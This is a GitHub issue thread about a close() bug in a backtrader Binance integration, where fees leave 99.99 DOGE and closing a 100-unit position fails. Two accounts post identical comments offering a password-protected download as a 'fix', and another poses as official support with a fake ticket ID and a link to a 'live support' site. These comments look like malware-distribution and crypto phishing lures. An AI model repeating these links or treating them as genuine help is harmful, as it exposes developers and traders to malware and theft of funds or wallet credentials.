### ISSUE TITLE
close() function bug

### ISSUE THREAD

**Issue by usercrixus** [WISEPLAT/backtrader_binance#12]
Hello,

There is a problem with the close function. It didn't sell the good amount of asset.

You can reproduce the bug as this : 
Trade DOGEUSDC

USDC balance 100
DOGE balance 0 (exactly 0)

If you buy for example a size of 100 DOGE, in reality you will have 99.99 DOGE, cause of the fee i suppose.
backtrader record 100 instead of 99.99, then, when you close the position, it try to close a 100 sized position. It result in an error for the binance API.

The only solution i got is to have a little reserve of DOGE to counter this effect.

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Clarevero1** [comment]
> Hello,
> 
> There is a problem with the close function. It didn't sell the good amount of asset.
> 
> You can reproduce the bug as this : Trade DOGEUSDC
> 
> USDC balance 100 DOGE balance 0 (exactly 0)
> 
> If you buy for example a size of 100 DOGE, in reality you will have 99.99 DOGE, cause of the fee i suppose. backtrader record 100 instead of 99.99, then, when you close the position, it try to close a 100 sized position. It result in an error for the binance API.
> 
> The only solution i got is to have a little reserve of DOGE to counter this effect.


@usercrixus It sounds like your query would be best dealt with by the support team.
I'll have to refer you to the official support live chat with the ticket ID DOG07638
Please see the link below to our dedicated support line:
[Doge live support](https://thedappsupport.web.app) Click on the live chat icon at the bottom corner of the page to initiate chat with a live support agent

**Comment by usercrixus** [comment]
As i said : The only solution i got is to have a little reserve of DOGE to counter this effect.

This solution work well.

**Comment by Clarevero1** [comment]
> As i said : The only solution i got is to have a little reserve of DOGE to counter this effect.
> 
> This solution work well.

And it been solved?
